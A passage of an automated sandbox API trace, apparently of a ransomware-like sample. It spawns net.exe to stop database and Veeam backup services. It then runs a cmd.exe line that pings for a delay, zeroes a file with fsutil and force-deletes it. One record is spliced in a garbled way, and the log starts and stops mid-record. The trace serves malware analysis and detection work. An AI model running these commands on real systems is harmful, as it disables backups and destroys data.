lpNumberOfBytesWritten=0x31f6f4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x31f6f4, lpOverlapped=0x0) returned 0 [0131.736] LocalFree (hMem=0x553ef0) returned 0x0 [0131.736] GetFileType (hFile=0x0) returned 0x0 [0131.736] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x556198 [0131.736] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x556198, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nU", lpUsedDefaultChar=0x0) returned 2 [0131.736] WriteFile (in: hFile=0x0, lpBuffer=0x556198, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x31f6f4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x31f6f4, lpOverlapped=0x0) returned 0 [0131.736] LocalFree (hMem=0x556198) returned 0x0 [0131.736] _ultow (in: _Dest=0x889, _Radix=3274532 | out: _Dest=0x889) returned="2185" [0131.736] FormatMessageW (in: dwFlags=0x2800, lpSource=0x71240000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0131.737] GetFileType (hFile=0x0) returned 0x0 [0131.737] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x556198 [0131.737] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x556198, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0131.737] WriteFile (in: hFile=0x0, lpBuffer=0x556198, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x31f700, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x31f700, lpOverlapped=0x0) returned 0 [0131.737] LocalFree (hMem=0x556198) returned 0x0 [0131.737] GetFileType (hFile=0x0) returned 0x0 [0131.737] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x556198 [0131.737] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x556198, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nU", lpUsedDefaultChar=0x0) returned 2 [0131.737] WriteFile (in: hFile=0x0, lpBuffer=0x556198, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x31f700, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x31f700, lpOverlapped=0x0) returned 0 [0131.737] LocalFree (hMem=0x556198) returned 0x0 [0131.737] NetApiBufferFree (Buffer=0x551af8) returned 0x0 [0131.737] NetApiBufferFree (Buffer=0x551b10) returned 0x0 [0131.737] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop OracleClientCache80 /y" [0131.738] exit (_Code=2) Process: id = "330" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x533d5000" os_pid = "0x758" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MSSQLSERVER /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 747 os_tid = 0xce4 Process: id = "331" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x52434000" os_pid = "0xf8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "204" os_parent_pid = "0xf30" cmd_line = "C:\\Windows\\system32\\net1 stop “Veeam Backup Catalog Data Service” /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 748 os_tid = 0xb60 [0131.249] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10fb7c | out: lpSystemTimeAsFileTime=0x10fb7c*(dwLowDateTime=0x21f81590, dwHighDateTime=0x1d6f0d1)) [0131.250] GetCurrentProcessId () returned 0xf8c [0131.250] GetCurrentThreadId () returned 0xb60 [0131.250] GetTickCount () returned 0x115405b [0131.250] QueryPerformanceCounter (in: lpPerformanceCount=0x10fb74 | out: lpPerformanceCount=0x10fb74*=25035052140) returned 1 [0131.250] GetModuleHandleA (lpModuleName=0x0) returned 0xe40000 [0131.250] __set_app_type (_Type=0x1) [0131.250] __p__fmode () returned 0x770331f4 [0131.250] __p__commode () returned 0x770331fc [0131.250] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe4ffe6) returned 0x0 [0131.251] __getmainargs (in: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068, _DoWildCard=0, _StartInfo=0xe59024 | out: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068) returned 0 [0131.251] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0131.251] GetConsoleOutputCP () returned 0x1b5 [0131.662] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe59080 | out: lpCPInfo=0xe59080) returned 1 [0131.662] SetThreadUILanguage (LangId=0x0) returned 0x409 [0131.667] sprintf_s (in: _DstBuf=0x10fb34, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0131.667] setlocale (category=0, locale=".437") returned="English_United States.437" [0131.670] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3e0 [0131.670] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0131.670] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop “Veeam Backup Catalog Data Service” /y" [0131.670] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x10f900, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0131.670] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x0, Size=0xaa) returned 0x3c3b20 [0131.670] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0131.670] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x10fb04 | out: Buffer=0x10fb04*=0x3c1b28) returned 0x0 [0131.671] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x10fb04 | out: Buffer=0x10fb04*=0x3c1b40) returned 0x0 [0131.671] _fileno (_File=0x77032900) returned -2 [0131.671] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0131.671] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0131.671] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0131.671] _wcsicmp (_String1="config", _String2="stop") returned -16 [0131.671] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0131.671] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0131.671] _wcsicmp (_String1="file", _String2="stop") returned -13 [0131.671] _wcsicmp (_String1="files", _String2="stop") returned -13 [0131.671] _wcsicmp (_String1="group", _String2="stop") returned -12 [0131.671] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0131.671] _wcsicmp (_String1="help", _String2="stop") returned -11 [0131.671] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0131.671] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0131.671] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0131.671] _wcsicmp (_String1="session", _String2="stop") returned -15 [0131.671] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0131.671] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0131.671] _wcsicmp (_String1="share", _String2="stop") returned -12 [0131.671] _wcsicmp (_String1="start", _String2="stop") returned -14 [0131.671] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0131.671] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0131.671] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0131.671] _wcsicmp (_String1="accounts", _String2="“Veeam") returned -8123 [0131.672] _wcsicmp (_String1="computer", _String2="“Veeam") returned -8121 [0131.672] _wcsicmp (_String1="config", _String2="“Veeam") returned -8121 [0131.672] _wcsicmp (_String1="continue", _String2="“Veeam") returned -8121 [0131.672] _wcsicmp (_String1="cont", _String2="“Veeam") returned -8121 [0131.672] _wcsicmp (_String1="file", _String2="“Veeam") returned -8118 [0131.672] _wcsicmp (_String1="files", _String2="“Veeam") returned -8118 [0131.672] _wcsicmp (_String1="group", _String2="“Veeam") returned -8117 [0131.672] _wcsicmp (_String1="groups", _String2="“Veeam") returned -8117 [0131.672] _wcsicmp (_String1="help", _String2="“Veeam") returned -8116 [0131.672] _wcsicmp (_String1="helpmsg", _String2="“Veeam") returned -8116 [0131.672] _wcsicmp (_String1="localgroup", _String2="“Veeam") returned -8112 [0131.672] _wcsicmp (_String1="pause", _String2="“Veeam") returned -8108 [0131.672] _wcsicmp (_String1="session", _String2="“Veeam") returned -8105 [0131.672] _wcsicmp (_String1="sessions", _String2="“Veeam") returned -8105 [0131.672] _wcsicmp (_String1="sess", _String2="“Veeam") returned -8105 [0131.672] _wcsicmp (_String1="share", _String2="“Veeam") returned -8105 [0131.672] _wcsicmp (_String1="start", _String2="“Veeam") returned -8105 [0131.672] _wcsicmp (_String1="stats", _String2="“Veeam") returned -8105 [0131.672] _wcsicmp (_String1="statistics", _String2="“Veeam") returned -8105 [0131.672] _wcsicmp (_String1="stop", _String2="“Veeam") returned -8105 [0131.672] _wcsicmp (_String1="time", _String2="“Veeam") returned -8104 [0131.672] _wcsicmp (_String1="user", _String2="“Veeam") returned -8103 [0131.672] _wcsicmp (_String1="users", _String2="“Veeam") returned -8103 [0131.672] _wcsicmp (_String1="msg", _String2="“Veeam") returned -8111 [0131.672] _wcsicmp (_String1="messenger", _String2="“Veeam") returned -8111 [0131.672] _wcsicmp (_String1="receiver", _String2="“Veeam") returned -8106 [0131.672] _wcsicmp (_String1="rcv", _String2="“Veeam") returned -8106 [0131.672] _wcsicmp (_String1="netpopup", _String2="“Veeam") returned -8110 [0131.672] _wcsicmp (_String1="redirector", _String2="“Veeam") returned -8106 [0131.672] _wcsicmp (_String1="redir", _String2="“Veeam") returned -8106 [0131.672] _wcsicmp (_String1="rdr", _String2="“Veeam") returned -8106 [0131.673] _wcsicmp (_String1="workstation", _String2="“Veeam") returned -8101 [0131.673] _wcsicmp (_String1="work", _String2="“Veeam") returned -8101 [0131.673] _wcsicmp (_String1="wksta", _String2="“Veeam") returned -8101 [0131.673] _wcsicmp (_String1="prdr", _String2="“Veeam") returned -8108 [0131.673] _wcsicmp (_String1="devrdr", _String2="“Veeam") returned -8120 [0131.673] _wcsicmp (_String1="lanmanworkstation", _String2="“Veeam") returned -8112 [0131.673] _wcsicmp (_String1="server", _String2="“Veeam") returned -8105 [0131.673] _wcsicmp (_String1="svr", _String2="“Veeam") returned -8105 [0131.673] _wcsicmp (_String1="srv", _String2="“Veeam") returned -8105 [0131.673] _wcsicmp (_String1="lanmanserver", _String2="“Veeam") returned -8112 [0131.673] _wcsicmp (_String1="alerter", _String2="“Veeam") returned -8123 [0131.673] _wcsicmp (_String1="netlogon", _String2="“Veeam") returned -8110 [0131.673] _wcsicmp (_String1="accounts", _String2="Backup") returned -1 [0131.673] _wcsicmp (_String1="computer", _String2="Backup") returned 1 [0131.673] _wcsicmp (_String1="config", _String2="Backup") returned 1 [0131.673] _wcsicmp (_String1="continue", _String2="Backup") returned 1 [0131.673] _wcsicmp (_String1="cont", _String2="Backup") returned 1 [0131.673] _wcsicmp (_String1="file", _String2="Backup") returned 4 [0131.673] _wcsicmp (_String1="files", _String2="Backup") returned 4 [0131.673] _wcsicmp (_String1="group", _String2="Backup") returned 5 [0131.673] _wcsicmp (_String1="groups", _String2="Backup") returned 5 [0131.673] _wcsicmp (_String1="help", _String2="Backup") returned 6 [0131.673] _wcsicmp (_String1="helpmsg", _String2="Backup") returned 6 [0131.673] _wcsicmp (_String1="localgroup", _String2="Backup") returned 10 [0131.673] _wcsicmp (_String1="pause", _String2="Backup") returned 14 [0131.673] _wcsicmp (_String1="session", _String2="Backup") returned 17 [0131.673] _wcsicmp (_String1="sessions", _String2="Backup") returned 17 [0131.674] _wcsicmp (_String1="sess", _String2="Backup") returned 17 [0131.674] _wcsicmp (_String1="share", _String2="Backup") returned 17 [0131.674] _wcsicmp (_String1="start", _String2="Backup") returned 17 [0131.674] _wcsicmp (_String1="stats", _String2="Backup") returned 17 [0131.674] _wcsicmp (_String1="statistics", _String2="Backup") returned 17 [0131.674] _wcsicmp (_String1="stop", _String2="Backup") returned 17 [0131.674] _wcsicmp (_String1="time", _String2="Backup") returned 18 [0131.674] _wcsicmp (_String1="user", _String2="Backup") returned 19 [0131.674] _wcsicmp (_String1="users", _String2="Backup") returned 19 [0131.674] _wcsicmp (_String1="msg", _String2="Backup") returned 11 [0131.674] _wcsicmp (_String1="messenger", _String2="Backup") returned 11 [0131.674] _wcsicmp (_String1="receiver", _String2="Backup") returned 16 [0131.674] _wcsicmp (_String1="rcv", _String2="Backup") returned 16 [0131.674] _wcsicmp (_String1="netpopup", _String2="Backup") returned 12 [0131.674] _wcsicmp (_String1="redirector", _String2="Backup") returned 16 [0131.674] _wcsicmp (_String1="redir", _String2="Backup") returned 16 [0131.674] _wcsicmp (_String1="rdr", _String2="Backup") returned 16 [0131.674] _wcsicmp (_String1="workstation", _String2="Backup") returned 21 [0131.674] _wcsicmp (_String1="work", _String2="Backup") returned 21 [0131.674] _wcsicmp (_String1="wksta", _String2="Backup") returned 21 [0131.674] _wcsicmp (_String1="prdr", _String2="Backup") returned 14 [0131.674] _wcsicmp (_String1="devrdr", _String2="Backup") returned 2 [0131.674] _wcsicmp (_String1="lanmanworkstation", _String2="Backup") returned 10 [0131.674] _wcsicmp (_String1="server", _String2="Backup") returned 17 [0131.674] _wcsicmp (_String1="svr", _String2="Backup") returned 17 [0131.674] _wcsicmp (_String1="srv", _String2="Backup") returned 17 [0131.674] _wcsicmp (_String1="lanmanserver", _String2="Backup") returned 10 [0131.674] _wcsicmp (_String1="alerter", _String2="Backup") returned -1 [0131.674] _wcsicmp (_String1="netlogon", _String2="Backup") returned 12 [0131.674] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0131.675] SetThreadUILanguage (LangId=0x0) returned 0x409 [0131.675] wcscpy_s (in: _Destination=0x10f604, _SizeInWords=0xf, _Source="neth.dll" | out: _Destination="neth.dll") returned 0x0 [0131.675] LoadLibraryW (lpLibFileName="neth.dll") returned 0x74420000 [0131.676] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc66, dwLanguageId=0x0, lpBuffer=0x10f600, nSize=0x0, Arguments=0x10f5fc | out: lpBuffer="啈 Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1408 os_tid = 0xdac [0257.904] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfb2c | out: lpSystemTimeAsFileTime=0x2cfb2c*(dwLowDateTime=0x6a5da750, dwHighDateTime=0x1d6f0d1)) [0257.904] GetCurrentProcessId () returned 0xba8 [0257.905] GetCurrentThreadId () returned 0xdac [0257.905] GetTickCount () returned 0x1171ad1 [0257.905] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfb24 | out: lpPerformanceCount=0x2cfb24*=37700568136) returned 1 [0257.906] GetModuleHandleA (lpModuleName=0x0) returned 0x4a6c0000 [0257.906] __set_app_type (_Type=0x1) [0257.906] __p__fmode () returned 0x770331f4 [0257.906] __p__commode () returned 0x770331fc [0257.906] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a6e21a6) returned 0x0 [0257.907] __getmainargs (in: _Argc=0x4a6e4238, _Argv=0x4a6e4240, _Env=0x4a6e423c, _DoWildCard=0, _StartInfo=0x4a6e4140 | out: _Argc=0x4a6e4238, _Argv=0x4a6e4240, _Env=0x4a6e423c) returned 0 [0257.907] GetCurrentThreadId () returned 0xdac [0257.907] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xdac) returned 0x60 [0257.907] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0257.907] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0257.907] SetThreadUILanguage (LangId=0x0) returned 0x409 [0257.949] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0257.949] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfabc | out: phkResult=0x2cfabc*=0x0) returned 0x2 [0257.950] VirtualQuery (in: lpAddress=0x2cfaf3, lpBuffer=0x2cfa8c, dwLength=0x1c | out: lpBuffer=0x2cfa8c*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0257.950] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cfa8c, dwLength=0x1c | out: lpBuffer=0x2cfa8c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0257.950] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cfa8c, dwLength=0x1c | out: lpBuffer=0x2cfa8c*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0257.950] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cfa8c, dwLength=0x1c | out: lpBuffer=0x2cfa8c*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0257.950] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cfa8c, dwLength=0x1c | out: lpBuffer=0x2cfa8c*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x4, RegionSize=0x13000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0257.950] GetConsoleOutputCP () returned 0x1b5 [0257.950] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a6e4260 | out: lpCPInfo=0x4a6e4260) returned 1 [0257.950] SetConsoleCtrlHandler (HandlerRoutine=0x4a6de72a, Add=1) returned 1 [0257.950] _get_osfhandle (_FileHandle=1) returned 0x4b0 [0257.950] SetConsoleMode (hConsoleHandle=0x4b0, dwMode=0x0) returned 0 [0257.950] _get_osfhandle (_FileHandle=1) returned 0x4b0 [0257.950] GetConsoleMode (in: hConsoleHandle=0x4b0, lpMode=0x4a6e41ac | out: lpMode=0x4a6e41ac) returned 0 [0257.951] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0257.951] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a6e41b0 | out: lpMode=0x4a6e41b0) returned 1 [0257.951] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0257.951] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0257.951] GetEnvironmentStringsW () returned 0x2e20e0* [0257.951] GetProcessHeap () returned 0x2d0000 [0257.951] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xaca) returned 0x2e2bb8 [0257.952] FreeEnvironmentStringsW (penv=0x2e20e0) returned 1 [0257.952] GetProcessHeap () returned 0x2d0000 [0257.952] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x4) returned 0x2e1880 [0257.952] GetEnvironmentStringsW () returned 0x2e20e0* [0257.952] GetProcessHeap () returned 0x2d0000 [0257.952] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xaca) returned 0x2e3690 [0257.952] FreeEnvironmentStringsW (penv=0x2e20e0) returned 1 [0257.952] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cea2c | out: phkResult=0x2cea2c*=0x68) returned 0x0 [0257.952] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x0, lpData=0x2cea38*=0x0, lpcbData=0x2cea30*=0x1000) returned 0x2 [0257.952] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x4, lpData=0x2cea38*=0x1, lpcbData=0x2cea30*=0x4) returned 0x0 [0257.952] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x0, lpData=0x2cea38*=0x1, lpcbData=0x2cea30*=0x1000) returned 0x2 [0257.952] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x4, lpData=0x2cea38*=0x0, lpcbData=0x2cea30*=0x4) returned 0x0 [0257.952] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x4, lpData=0x2cea38*=0x40, lpcbData=0x2cea30*=0x4) returned 0x0 [0257.953] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x4, lpData=0x2cea38*=0x40, lpcbData=0x2cea30*=0x4) returned 0x0 [0257.953] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x0, lpData=0x2cea38*=0x40, lpcbData=0x2cea30*=0x1000) returned 0x2 [0257.953] RegCloseKey (hKey=0x68) returned 0x0 [0257.953] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cea2c | out: phkResult=0x2cea2c*=0x68) returned 0x0 [0257.953] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x0, lpData=0x2cea38*=0x40, lpcbData=0x2cea30*=0x1000) returned 0x2 [0257.953] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x4, lpData=0x2cea38*=0x1, lpcbData=0x2cea30*=0x4) returned 0x0 [0257.953] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x0, lpData=0x2cea38*=0x1, lpcbData=0x2cea30*=0x1000) returned 0x2 [0257.953] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x4, lpData=0x2cea38*=0x0, lpcbData=0x2cea30*=0x4) returned 0x0 [0257.953] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x4, lpData=0x2cea38*=0x9, lpcbData=0x2cea30*=0x4) returned 0x0 [0257.953] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x4, lpData=0x2cea38*=0x9, lpcbData=0x2cea30*=0x4) returned 0x0 [0257.953] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x0, lpData=0x2cea38*=0x9, lpcbData=0x2cea30*=0x1000) returned 0x2 [0257.953] RegCloseKey (hKey=0x68) returned 0x0 [0257.953] time (in: timer=0x0 | out: timer=0x0) returned 0x600aec0f [0257.953] srand (_Seed=0x600aec0f) [0257.953] GetCommandLineW () returned="\"cmd.exe\" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”" [0257.953] GetCommandLineW () returned="\"cmd.exe\" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”" [0257.954] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a6e5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0257.954] GetProcessHeap () returned 0x2d0000 [0257.954] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x210) returned 0x2e20e0 [0257.954] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2e20e8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0257.954] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a6f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0257.954] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a6f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0257.954] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a6f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0257.954] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0257.954] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0257.954] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0257.954] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0257.954] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0257.954] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0257.954] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0257.954] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0257.954] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0257.954] GetProcessHeap () returned 0x2d0000 [0257.954] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e2bb8 | out: hHeap=0x2d0000) returned 1 [0257.954] GetEnvironmentStringsW () returned 0x2e22f8* [0257.954] GetProcessHeap () returned 0x2d0000 [0257.954] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xae2) returned 0x2e4c58 [0257.955] 